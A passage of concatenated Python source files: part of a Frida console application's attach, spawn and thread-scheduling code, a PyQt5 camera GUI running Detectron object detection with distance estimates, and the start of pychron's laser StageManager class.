self._device = frida.get_device_manager().add_remote_device(self._host)
else:
self._device = frida.get_local_device()
self._device.on('output', self._schedule_on_output)
self._device.on('lost', self._schedule_on_device_lost)
if self._target is not None:
spawning = True
try:
target_type, target_value = self._target
if target_type == 'frontmost':
try:
app = self._device.get_frontmost_application()
except Exception as e:
self._update_status("Unable to get frontmost application on {}: {}".format(self._device.name, e))
self._exit(1)
return
if app is None:
self._update_status("No frontmost application on {}".format(self._device.name))
self._exit(1)
return
self._target = ('name', app.name)
attach_target = app.pid
elif target_type == 'file':
argv = target_value
if not self._quiet:
self._update_status("Spawning `%s`..." % " ".join(argv))
aux_kwargs = {}
if self._aux is not None:
aux_kwargs = dict([parse_aux_option(o) for o in self._aux])
self._spawned_pid = self._device.spawn(argv, stdio=self._stdio, **aux_kwargs)
self._spawned_argv = argv
attach_target = self._spawned_pid
else:
attach_target = target_value
if not isinstance(attach_target, numbers.Number):
attach_target = self._device.get_process(attach_target).pid
if not self._quiet:
self._update_status("Attaching...")
spawning = False
self._target_pid = attach_target
self._session = self._device.attach(attach_target)
if self._enable_debugger:
self._session.enable_debugger()
self._print("Chrome Inspector server listening on port 9229\n")
self._session.on('detached', self._schedule_on_session_detached)
except frida.OperationCancelledError:
self._exit(0)
return
except Exception as e:
if spawning:
self._update_status("Failed to spawn: %s" % e)
else:
self._update_status("Failed to attach: %s" % e)
self._exit(1)
return
self._start()
self._started = True
def _show_message_if_no_device(self):
if self._device is None:
self._print("Waiting for USB device to appear...")
def _on_sigterm(self, n, f):
self._reactor.cancel_io()
self._exit(0)
def _on_output(self, pid, fd, data):
if pid != self._target_pid or data is None:
return
if fd == 1:
prefix = "stdout> "
stream = sys.stdout
else:
prefix = "stderr> "
stream = sys.stderr
encoding = stream.encoding or 'UTF-8'
text = data.decode(encoding, errors='replace')
if text.endswith("\n"):
text = text[:-1]
lines = text.split("\n")
self._print(prefix + ("\n" + prefix).join(lines))
def _on_device_lost(self):
if self._exit_status is not None:
return
self._print("Device disconnected.")
self._exit(1)
def _on_session_detached(self, reason, crash):
if crash is None:
message = reason[0].upper() + reason[1:].replace("-", " ")
else:
message = "Process crashed: " + crash.summary
self._print(Fore.RED + Style.BRIGHT + message + Style.RESET_ALL)
if crash is not None:
if self._squelch_crash is True:
self._print("\n*** Crash report was squelched due to user setting. ***")
else:
self._print("\n***\n{}\n***".format(crash.report.rstrip("\n")))
self._exit(1)
def _clear_status(self):
if self._console_state == ConsoleState.STATUS:
print(Cursor.UP() + (80 * " "))
def _update_status(self, message):
if self._have_terminal:
if self._console_state == ConsoleState.STATUS:
cursor_position = Cursor.UP()
else:
cursor_position = ""
print("%-80s" % (cursor_position + Style.BRIGHT + message + Style.RESET_ALL,))
self._console_state = ConsoleState.STATUS
else:
print(Style.BRIGHT + message + Style.RESET_ALL)
def _print(self, *args, **kwargs):
encoded_args = []
encoding = sys.stdout.encoding or 'UTF-8'
if encoding == 'UTF-8':
encoded_args = args
else:
if sys.version_info[0] >= 3:
string_type = str
else:
string_type = unicode
for arg in args:
if isinstance(arg, string_type):
encoded_args.append(arg.encode(encoding, errors='backslashreplace').decode(encoding))
else:
encoded_args.append(arg)
print(*encoded_args, **kwargs)
self._console_state = ConsoleState.TEXT
def _log(self, level, text):
if level == 'info':
self._print(text)
else:
color = Fore.RED if level == 'error' else Fore.YELLOW
text = color + Style.BRIGHT + text + Style.RESET_ALL
if level == 'error':
self._print(text, file=sys.stderr)
else:
self._print(text)
def _perform_on_reactor_thread(self, f):
completed = threading.Event()
result = [None, None]
def work():
try:
result[0] = f()
except Exception as e:
result[1] = e
completed.set()
self._reactor.schedule(work)
while not completed.is_set():
try:
completed.wait()
except KeyboardInterrupt:
self._reactor.cancel_io()
continue
error = result[1]
if error is not None:
raise error
return result[0]
def _perform_on_background_thread(self, f, timeout=None):
result = [None, None]
def work():
with self._reactor.io_cancellable:
try:
result[0] = f()
except Exception as e:
result[1] = e
worker = threading.Thread(target=work)
worker.start()
try:
worker.join(timeout)
except KeyboardInterrupt:
self._reactor.cancel_io()
if timeout is not None and worker.is_alive():
self._reactor.cancel_io()
while worker.is_alive():
try:
worker.join()
except KeyboardInterrupt:
pass
error = result[1]
if error is not None:
raise error
return result[0]
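# -O/--options-file support: extra command line arguments can be read from text
# files, which may themselves reference further options files. compute_real_args()
# expands them iteratively and refuses to process the same file twice.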
def compute_real_args(parser):
real_args = normalize_options_file_args(sys.argv[1:])
files_processed = set()
while True:
offset = find_options_file_offset(real_args, parser)
if offset == -1:
break
file_path = os.path.abspath(real_args[offset + 1])
if file_path in files_processed:
parser.error("File '{}' given twice as -O argument".format(file_path))
if os.path.isfile(file_path):
with codecs.open(file_path, 'r', 'utf-8') as f:
new_arg_text = f.read()
else:
parser.error("File '{}' following -O option is not a valid file".format(file_path))
real_args = insert_options_file_args_in_list(real_args, offset, new_arg_text)
files_processed.add(file_path)
return real_args
def normalize_options_file_args(raw_args):
result = []
for arg in raw_args:
if arg.startswith("--options-file="):
result.append(arg[0:14])
result.append(arg[15:])
else:
result.append(arg)
return result
def find_options_file_offset(arglist, parser):
for i, arg in enumerate(arglist):
if arg in ("-O", "--options-file"):
if i < len(arglist) - 1:
return i
else:
parser.error("No argument given for -O option")
return -1
def insert_options_file_args_in_list(args, offset, new_arg_text):
new_args = shlex.split(new_arg_text)
new_args = normalize_options_file_args(new_args)
new_args_list = args[:offset] + new_args + args[offset + 2:]
return new_args_list
def find_device(type):
for device in frida.enumerate_devices():
if device.type == type:
return device
return None
def infer_target(target_value):
if target_value.startswith('.') or target_value.startswith(os.path.sep) \
or (platform.system() == 'Windows' \
and target_value[0].isalpha() \
and target_value[1] == ":" \
and target_value[2] == "\\"):
target_type = 'file'
target_value = [target_value]
else:
try:
target_value = int(target_value)
target_type = 'pid'
except:
target_type = 'name'
return (target_type, target_value)
def expand_target(target):
target_type, target_value = target
if target_type == 'file':
target_value = [target_value[0]]
return (target_type, target_value)
def parse_aux_option(option):
m = AUX_OPTION_PATTERN.match(option)
if m is None:
raise ValueError("expected name=(type)value, e.g. “uid=(int)42”; supported types are: string, bool, int")
name = m.group(1)
type_decl = m.group(2)
raw_value = m.group(3)
if type_decl == 'string':
value = raw_value
elif type_decl == 'bool':
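# note: bool() of any non-empty string is True, so a raw value of "false"
# still yields True here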
value = bool(raw_value)
else:
value = int(raw_value)
return (name, value)
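# Minimal scheduler backing the console application: callables are queued with an
# optional delay and executed on a dedicated worker thread, while run_until_return
# (e.g. waiting for the user to press ENTER) blocks the calling thread until exit.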
class Reactor(object):
def __init__(self, run_until_return, on_stop=None):
self._running = False
self._run_until_return = run_until_return
self._on_stop = on_stop
self._pending = collections.deque([])
self._lock = threading.Lock()
self._cond = threading.Condition(self._lock)
self.io_cancellable = frida.Cancellable()
self.ui_cancellable = frida.Cancellable()
self._ui_cancellable_fd = self.ui_cancellable.get_pollfd()
def __del__(self):
self._ui_cancellable_fd.release()
def is_running(self):
with self._lock:
return self._running
def run(self):
with self._lock:
self._running = True
worker = threading.Thread(target=self._run)
worker.start()
self._run_until_return(self)
self.stop()
worker.join()
def _run(self):
running = True
while running:
now = time.time()
work = None
timeout = None
previous_pending_length = -1
with self._lock:
for item in self._pending:
(f, when) = item
if now >= when:
work = f
self._pending.remove(item)
break
if len(self._pending) > 0:
timeout = max([min(map(lambda item: item[1], self._pending)) - now, 0])
previous_pending_length = len(self._pending)
if work is not None:
with self.io_cancellable:
try:
work()
except frida.OperationCancelledError:
pass
with self._lock:
if self._running and len(self._pending) == previous_pending_length:
self._cond.wait(timeout)
running = self._running
if self._on_stop is not None:
self._on_stop()
self.ui_cancellable.cancel()
def stop(self):
self.schedule(self._stop)
def _stop(self):
with self._lock:
self._running = False
def schedule(self, f, delay=None):
now = time.time()
if delay is not None:
when = now + delay
else:
when = now
with self._lock:
self._pending.append((f, when))
self._cond.notify()
def cancel_io(self):
self.io_cancellable.cancel()
|
gui.py
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'camara_ui.ui'
#
# Created by: PyQt5 UI code generator 5.5.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sys
import cv2
import numpy as np
import threading
import time
import Queue
running = False
capture_thread = None
q = Queue.Queue()
# q = Queue.Queue(maxsize=10)
from collections import defaultdict
import argparse
import glob
import logging
import os
import math
reload(sys)
sys.setdefaultencoding('utf-8')
sys.path.append('/home/vpa/github/caffe2/build')
sys.path.append('/home/vpa/github/cocoapi/PythonAPI')
from caffe2.python import workspace
from PIL import Image, ImageDraw, ImageFont
from core.config import assert_and_infer_cfg
from core.config import cfg
from core.config import merge_cfg_from_file
from utils.timer import Timer
import core.test_engine as infer_engine
import datasets.dummy_datasets as dummy_datasets
import utils.c2 as c2_utils
c2_utils.import_detectron_ops()
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
_GRAY = (218, 227, 218)
_GREEN = (18, 127, 15)
_WHITE = (255, 255, 255)
def parse_args():
parser = argparse.ArgumentParser(description='End-to-end inference')
parser.add_argument(
'--cfg',
dest='cfg',
help='cfg model file (/path/to/model_config.yaml)',
default='/home/vpa/github/Detectron/configs/12_2017_baselines/e2e_faster_rcnn_R-50-FPN_2x.yaml',
type=str
)
parser.add_argument(
'--wts',
dest='weights',
help='weights model file (/path/to/model_weights.pkl)',
default='/home/vpa/models/detectron/e2e_faster_rcnn_R-50-FPN_2x.pkl',
type=str
)
# if len(sys.argv) == 1:
# parser.print_help()
# sys.exit(1)
return parser.parse_args()
def get_class_string(class_index, score, class_names):
class_text = class_names[class_index] if class_names is not None else \
'id{:d}'.format(class_index)
# return class_text + ' {:0.2f}'.format(score).lstrip('0')
return class_text
def vis_class(img, pos, class_str, theta, radius, font_scale=0.35):
"""Visualizes the class."""
x0, y0 = int(pos[0]), int(pos[1])
# if theta > 0:
# thetaText = u' 右前方%d度'%math.fabs(theta)
# elif theta ==0:
# thetaText = u' 正前方' % math.fabs(theta)
# else:
# thetaText = u' 左前方%d度' % math.fabs(theta)
thetaText = u'%d度'%(90-theta)
distText=u'%.2f米'%radius
txt = class_str+thetaText+distText
# cv2 to pil
cv2_im = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # OpenCV stores colors as BGR while PIL expects RGB
pil_im = Image.fromarray(cv2_im)
# draw pil
draw = ImageDraw.Draw(pil_im) # the canvas to draw on; text is drawn directly onto the frame
font = ImageFont.truetype("/usr/share/fonts/truetype/simsun.ttc", 15, encoding="utf-8") # first argument is the font file path, second the font size
draw.text((x0, y0-15), txt, (0, 255, 0), font=font) # arguments: position, text, text color, font
# pil to cv2
img = cv2.cvtColor(np.array(pil_im), cv2.COLOR_RGB2BGR)
#cv2.imshow("detect", img)
# Compute text size.
# txt = class_str
# font = cv2.FONT_HERSHEY_SIMPLEX
# ((txt_w, txt_h), _) = cv2.getTextSize(txt, font, font_scale, 1)
# Place text background.
# back_tl = x0, y0 - int(1.3 * txt_h)
# back_br = x0 + txt_w, y0
# cv2.rectangle(img, back_tl, back_br, _GREEN, -1)
# Show text.
# txt_tl = x0, y0 - int(0.3 * txt_h)
# cv2.putText(img, txt, txt_tl, font, font_scale, _GRAY, lineType=cv2.LINE_AA)
return img
def vis_bbox(img, bbox, thick=1, color=_GREEN):
"""Visualizes a bounding box."""
(x0, y0, w, h) = bbox
x1, y1 = int(x0 + w), int(y0 + h)
x0, y0 = int(x0), int(y0)
cv2.rectangle(img, (x0, y0), (x1, y1), color, thickness=thick)
return img
def computeaspect(bbox):
"""compute distance and aspect of the object ."""
u, v = (bbox[0] + bbox[2]) / 2.0, bbox[3]
x = 0.0230 * u - ((0.9996 * u - 550.3179) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 12.9168
y = ((0.0070 * u - 1.6439e+03) * (37.6942 * v - 2.2244e+06)) / (
1.6394e+03 * v - 4.1343e+05) - 1.6046e-04 * u + 0.0902
theta = math.degrees(math.atan2(y, x))
radius = math.sqrt(x ** 2 + y ** 2)/1000
return theta, radius
def demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=[], show_box=False,dataset=None, show_class=False,
class_names=[], color_list=[], cls_sel=[],queue=[],frame=[],count=[],start_time=[]):
"""Constructs a numpy array with the detections visualized."""
box_list = [b for b in [cls_boxes[i] for i in cls_sel] if len(b) > 0]
if len(box_list) > 0:
boxes = np.concatenate(box_list)
else:
boxes = None
classes = []
# for j in range(len(cls_boxes)):
for j in cls_sel:
# print(len(cls_boxes[j]))
classes += [j] * len(cls_boxes[j])
if boxes is None or boxes.shape[0] == 0 or max(boxes[:, 4]) < min(thresh):
return im
# for i in sorted_inds:
for i, cls_id in enumerate(classes[0:]):
bbox = boxes[i, :4]
score = boxes[i, -1]
if score < thresh[cls_id]:
continue
theta, radius = computeaspect(bbox)
# show box (off by default)
if show_box:
im = vis_bbox(
im, (bbox[0], bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]), color=color_list[cls_id])
# show class (off by default)
if show_class:
class_str = get_class_string(classes[i], score, class_names)
im = vis_class(im, (bbox[0], bbox[1], bbox[2], bbox[3]), class_str, theta, radius)
# avg_fps = (count-4) / (time.time() - start_time)
# cv2.putText(im, '{:s} {:.1f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 255),
# lineType=cv2.LINE_AA)
frame["img"] = im
# if queue.qsize() < 10:
# queue.put(frame)
# else:
# break
return frame
def camera(cam, queue, width, height, fps, args):
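# Runs on a background thread: the Detectron model is loaded once, then frames are
# grabbed from the camera in a loop and pushed onto the queue polled by the Qt GUI.
# While the global `running` flag is set, each frame is first run through the
# detector and annotated with boxes, class labels and an FPS counter.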
global running
logger = logging.getLogger(__name__)
merge_cfg_from_file(args.cfg)
cfg.TEST.WEIGHTS = args.weights
cfg.NUM_GPUS = 1
assert_and_infer_cfg()
model = infer_engine.initialize_model_from_cfg()
dummy_coco_dataset = dummy_datasets.get_coco_dataset()
start_time = 0
count = 0
# class_names =[
# '__background__', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck']
# color_list=[[0,0,0],[255,0,0],[0,255,0],[0,0,255],[255,255,0],[0,255,255],[255,255,0],[255,0,255],[255,255,255]]
class_names = [
'__background__', u'人', u'自行车', u'车', u'摩托车', 'airplane',
u'车', 'train', u'车']
color_list = [[0, 0, 0], [255, 0, 0], [0, 255, 0], [0, 0, 255], [255, 255, 0], [0, 0, 255], [0, 0, 255],
[255, 0, 255], [0, 0, 255]]
cls_sel = [1, 2, 3, 4, 6, 8]
cls_thresh = [1, 0.8, 0.6, 0.9, 0.6, 0.9, 0.8, 0.9, 0.8]
if count == 0:
logger.info(
' \ Note: inference on the first image will be slower than the '
'rest (caches and auto-tuning need to warm up)'
)
capture = cv2.VideoCapture(cam)
capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
# capture.set(cv2.CAP_PROP_FPS, fps)
# size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT)))
#print(cv2.__version__)
total=0
while True:
frame = {}
ret, im = capture.read()
# timers = defaultdict(Timer)
# # detect one image
if running==False:
frame["img"]=im
count =0
else:
if count==5:
start_time = time.time()
count = count + 1
with c2_utils.NamedCudaScope(0):
cls_boxes, _, _ = infer_engine.im_detect_all(
model, im, None, timers=None)
demo_vis_one_imageboxes_opencv(im, cls_boxes, thresh=cls_thresh, show_box=True, dataset=dummy_coco_dataset,
show_class=True, class_names=class_names, color_list=color_list, cls_sel=cls_sel,
queue=q,frame=frame)
if count>=5:
avg_fps = (count-4) / (time.time() - start_time)
cv2.putText(frame["img"], '{:s} {:.2f}/s'.format('fps', avg_fps), (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 128, 255),
lineType=cv2.LINE_AA)
queue.put(frame)
print(queue.qsize())
# if queue.qsize() >= 10:
# break
# frame["img"] = im
# if queue.qsize() < 20:
# queue.put(frame)
# else:
# break
# print(queue.qsize())
# if queue.qsize() >= 10:
# break
# print(queue.qsize())
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
class OwnImageWidget(QtWidgets.QWidget):
def __init__(self, parent=None):
super(OwnImageWidget, self).__init__(parent)
self.image = None
def setImage(self, image):
self.image = image
sz = image.size()
self.setMinimumSize(sz)
self.update()
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
if self.image:
qp.drawImage(QtCore.QPoint(0, 0), self.image)
qp.end()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(2560, 1440)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(180, 160, 2000, 1200))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setObjectName("verticalLayout")
self.horizentalLayout = QtWidgets.QHBoxLayout(self.verticalLayoutWidget)
self.horizentalLayout.setObjectName("horizentalLayout")
self.startButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.stopButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.exitButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
font = QtGui.QFont()
font.setPointSize(15)
#start button
self.startButton.setFont(font)
self.startButton.setObjectName("startButton")
self.horizentalLayout.addWidget(self.startButton)
self.horizentalLayout.addSpacing(30)
#stop button
self.stopButton.setFont(font)
self.stopButton.setObjectName("stopButton")
self.horizentalLayout.addWidget(self.stopButton)
self.horizentalLayout.addSpacing(30)
# exit button
self.exitButton.setFont(font)
self.exitButton.setObjectName("exitButton")
self.horizentalLayout.addWidget(self.exitButton)
self.verticalLayout.addLayout(self.horizentalLayout, stretch=0)
# self.verticalLayout.addSpacing(5)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(0, 0, 180, 180))
self.label.setObjectName("logo")
jpg = QtGui.QPixmap('/home/vpa/github/Detectron_jdy/tools/logo2.jpg')
self.label.setPixmap(jpg)
MainWindow.setCentralWidget(self.centralwidget)
self.groupBox = QtWidgets.QGroupBox(self.verticalLayoutWidget)
self.groupBox.setObjectName("groupBox")
self.widget = QtWidgets.QWidget(self.groupBox)
self.widget.setGeometry(QtCore.QRect(0, 20, 2000, 1200))
self.widget.setObjectName("widget")
self.verticalLayout.addWidget(self.groupBox)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 789, 25))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(700, 60, 1000, 91))
font = QtGui.QFont()
font.setPointSize(25)
self.label.setFont(font)
self.label.setObjectName("label")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.startButton.clicked.connect(self.start_clicked)
self.stopButton.clicked.connect(self.stop_clicked)
self.exitButton.clicked.connect(self.exit_clicked)
self.window_width = self.widget.frameSize().width()
self.window_height = self.widget.frameSize().height()
self.ImgWidget = OwnImageWidget(self.widget)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.update_frame)
self.timer.start(1)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "目标检测系统"))
self.startButton.setText(_translate("MainWindow", "开始检测"))
self.stopButton.setText(_translate("MainWindow", "结束检测"))
self.exitButton.setText(_translate("MainWindow", "退出"))
self.groupBox.setTitle(_translate("MainWindow", ""))
self.label.setText(_translate("MainWindow", "天津大学视觉模式分析实验室目标检测系统"))
def start_clicked(self):
global running
running = True
# capture_thread.start()
self.startButton.setEnabled(False)
self.startButton.setText('准备检测')
def stop_clicked(self):
global running
running = False
self.stopButton.setEnabled(False)
self.stopButton.setText('正在结束')
self.startButton.setEnabled(False)
self.startButton.setText('正在结束检测')
self.stopButton.setEnabled(True)
self.stopButton.setText('结束检测')
self.startButton.setEnabled(True)
self.startButton.setText('开始检测')
def exit_clicked(self):
# capture_thread.stop()
# capture_thread.join()
capture_thread.exit()
def update_frame(self):
if not q.empty():
self.startButton.setText('正在检测')
frame = q.get()
img = frame["img"]
img_height, img_width, img_colors = img.shape
scale_w = float(self.window_width) / float(img_width)
scale_h = float(self.window_height) / float(img_height)
scale = min([scale_w, scale_h])
if scale == 0:
scale = 1
img = cv2.resize(img, None, fx=scale, fy=scale, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
height, width, bpc = img.shape
bpl = bpc * width
image = QtGui.QImage(img.data, width, height, bpl, QtGui.QImage.Format_RGB888)
self.ImgWidget.setImage(image)
q.task_done()
def closeEvent(self, event):
global running
running = False
if __name__ == "__main__":
import sys
capture_thread = threading.Thread(target=camera, args=(0, q, 800, 600, 30, parse_args()))
capture_thread.start()
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
stage_manager.py
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import time
from numpy import array, asarray
# =============enthought library imports=======================
from traits.api import DelegatesTo, Instance, Button, List, String, Event, Bool
from pychron.canvas.canvas2D.laser_tray_canvas import LaserTrayCanvas
from pychron.core.geometry.convex_hull import convex_hull
from pychron.core.geometry.geometry import sort_clockwise
from pychron.core.geometry.polygon_offset import polygon_offset
from pychron.core.helpers.filetools import add_extension
from pychron.core.helpers.strtools import csv_to_floats
from pychron.core.ui.preference_binding import bind_preference, ColorPreferenceBinding
from pychron.core.ui.thread import Thread
from pychron.experiment.utilities.position_regex import (
POINT_REGEX,
XY_REGEX,
TRANSECT_REGEX,
)
from pychron.hardware.motion_controller import (
MotionController,
TargetPositionError,
ZeroDisplacementException,
)
from pychron.lasers.points.points_programmer import PointsProgrammer
from pychron.managers.motion_controller_managers.motion_controller_manager import (
MotionControllerManager,
)
from pychron.paths import paths
from pychron.stage.stage_manager import BaseStageManager
def distance_threshold(p1, p2, tol):
if p2 is None:
return True
x1, y1 = p1
x2, y2 = p2
return ((x1 - x2) ** 2 + (y1 - y2) ** 2) ** 0.5 > tol
class StageManager(BaseStageManager):
""" """
stage_controller_klass = String("Newport")
stage_controller = Instance(MotionController)
points_programmer = Instance(PointsProgrammer)
motion_controller_manager = Instance(MotionControllerManager)
# canvas = Instance(LaserTrayCanvas)
simulation = DelegatesTo("stage_controller")
# stage_map_klass = StageMap
# _stage_map = Instance(StageMap)
# stage_map = Property(depends_on='_stage_map')
# stage_maps = Property(depends_on='_stage_maps')
# _stage_maps = List
# ===========================================================================
# buttons
# ===========================================================================
home = Button("home")
home_option = String("Home All")
home_options = List
manual_override_position_button = Event
ejoystick = Event
joystick_label = String("Enable Joystick")
joystick = Bool(False)
joystick_timer = None
back_button = Button
stop_button = Button("Stop")
_default_z = 0
_cached_position = None
_cached_current_hole = None
_homing = False
def __init__(self, *args, **kw):
""" """
super(StageManager, self).__init__(*args, **kw)
self.stage_controller = self._stage_controller_factory()
def measure_grain_polygon(self):
pass
def stop_measure_grain_polygon(self):
pass
def shutdown(self):
self._save_stage_map()
def create_device(self, *args, **kw):
dev = super(StageManager, self).create_device(*args, **kw)
dev.parent = self
return dev
def goto_position(self, v, **kw):
if XY_REGEX[0].match(v):
self._move_to_calibrated_position(v)
elif POINT_REGEX.match(v) or TRANSECT_REGEX[0].match(v):
self.move_to_point(v)
else:
self.move_to_hole(v, user_entry=True, **kw)
def get_current_position(self, **kw):
if self.stage_controller:
x = self.stage_controller.x
y = self.stage_controller.y
return x, y
def get_current_hole(self):
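# The hole lookup is only repeated once the stage has moved more than a quarter of
# a hole dimension away from the last cached position, avoiding a stage-map query
# on every poll.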
pos = self.get_current_position()
if self.stage_map:
if distance_threshold(
pos, self._cached_position, self.stage_map.g_dimension / 4
):
h = self.get_calibrated_hole(*pos, tol=self.stage_map.g_dimension / 2.0)
if h is not None:
self._cached_current_hole = h
self._cached_position = pos
return self._cached_current_hole
def is_auto_correcting(self):
return False
def cancel_auto_correcting(self):
return True
def bind_preferences(self, pref_id):
bind_preference(self.canvas, "show_grids", "{}.show_grids".format(pref_id))
self.canvas.change_grid_visibility()
bind_preference(
self.canvas, "show_laser_position", "{}.show_laser_position".format(pref_id)
)
bind_preference(
self.canvas,
"show_desired_position",
"{}.show_desired_position".format(pref_id),
)
bind_preference(
self.canvas,
"desired_position_color",
"{}.desired_position_color".format(pref_id),
factory=ColorPreferenceBinding,
)
# bind_preference(self.canvas, 'render_map', '{}.render_map'.format(pref_id))
#
bind_preference(
self.canvas, "crosshairs_kind", "{}.crosshairs_kind".format(pref_id)
)
for tag in ("", "aux_"):
for key in ("line_width", "color", "radius", "offsetx", "offsety"):
key = "{}crosshairs_{}".format(tag, key)
factory = ColorPreferenceBinding if key.endswith("color") else None
pref = "{}.{}".format(pref_id, key)
bind_preference(self.canvas, key, pref, factory=factory)
# bind_preference(self.canvas, '{}crosshairs_line_width', '{}.{}crosshairs_line_width'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_color',
# '{}.crosshairs_color'.format(pref_id),
# factory=ColorPreferenceBinding)
# bind_preference(self.canvas, 'crosshairs_radius', '{}.crosshairs_radius'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsetx', '{}.crosshairs_offsetx'.format(pref_id))
# bind_preference(self.canvas, 'crosshairs_offsety', '{}.crosshairs_offsety'.format(pref_id))
bind_preference(
self.canvas, "show_hole_label", "{}.show_hole_label".format(pref_id)
)
bind_preference(
self.canvas, "hole_label_color", "{}.hole_label_color".format(pref_id)
)
bind_preference(
self.canvas, "hole_label_size", "{}.hole_label_size".format(pref_id)
)
self.canvas.handle_hole_label_size(self.canvas.hole_label_size)
bind_preference(self.canvas, "scaling", "{}.scaling".format(pref_id))
bind_preference(
self.canvas, "show_bounds_rect", "{}.show_bounds_rect".format(pref_id)
)
self.canvas.request_redraw()
def load(self):
super(StageManager, self).load()
config = self.get_configuration()
if config:
self._default_z = self.config_get(
config, "Defaults", "z", default=13, cast="float"
)
self.points_programmer.load_stage_map(self.stage_map_name)
# load the calibration file
# should have calibration files for each stage map
self.tray_calibration_manager.load_calibration()
def finish_loading(self):
self.initialize_stage()
def initialize_stage(self):
self.update_axes()
axes = self.stage_controller.axes
self.home_options = ["Home All", "XY"] + sorted(
[axes[a].name.upper() for a in axes]
)
self.canvas.parent = self
def save_calibration(self, name):
self.tray_calibration_manager.save_calibration(name=name)
# def add_stage_map(self, v):
# sm = self.stage_map_klass(file_path=v)
# psm = self._get_stage_map_by_name(sm.name)
# if psm:
# self._stage_maps.remove(psm)
# self._stage_maps.append(sm)
def accept_point(self):
self.points_programmer.accept_point()
def set_stage_map(self, v):
return self._set_stage_map(v)
def single_axis_move(self, *args, **kw):
return self.stage_controller.single_axis_move(*args, **kw)
def linear_move(
self,
x,
y,
use_calibration=True,
check_moving=False,
abort_if_moving=False,
**kw
):
if check_moving:
if self.moving():
self.warning("MotionController already in motion")
if abort_if_moving:
self.warning("Move to {},{} aborted".format(x, y))
return
else:
self.stop()
self.debug("Motion stopped. moving to {},{}".format(x, y))
pos = (x, y)
if use_calibration:
pos = self.get_calibrated_position(pos)
f = lambda x: "{:0.5f},{:0.5f}".format(*x)
self.debug("%%%%%%%%%%%%%%%%% mapped {} to {}".format(f((x, y)), f(pos)))
self.stage_controller.linear_move(*pos, **kw)
def move_to_hole(self, hole, **kw):
if self.stage_map.check_valid_hole(hole, **kw):
self._move(self._move_to_hole, hole, name="move_to_hole", **kw)
def move_to_point(self, pt):
self._move(self._move_to_point, pt, name="move_to_point")
def move_polyline(self, line):
self._move(self._move_to_line, line, name="move_to_line")
def move_polygon(self, poly):
self._move(self._move_polygon, poly, name="move_polygon")
def drill_point(self, pt):
self._move(self._drill_point, pt, name="drill_point")
def set_x(self, value, **kw):
return self.stage_controller.single_axis_move("x", value, **kw)
def set_y(self, value, **kw):
return self.stage_controller.single_axis_move("y", value, **kw)
def set_z(self, value, **kw):
return self.stage_controller.single_axis_move("z", value, **kw)
def set_xy(self, x, y, **kw):
hole = self._get_hole_by_position(x, y)
if hole:
self.move_to_hole(hole)
# self._set_hole(hole.id)
# self.move_to_hole(hole.id)
# self._set_hole(hole.id)
else:
return self.linear_move(x, y, **kw)
def get_hole(self, name):
if self.stage_map:
return self.stage_map.get_hole(name)
def move_to_load_position(self):
""" """
x, y, z = self.stage_controller.get_load_position()
self.info("moving to load position, x={}, y={}, z={}".format(x, y, z))
self.stage_controller.linear_move(x, y, grouped_move=False, block=False)
self.stage_controller.set_z(z)
self.stage_controller.block()
def stop(self, ax_key=None, verbose=False):
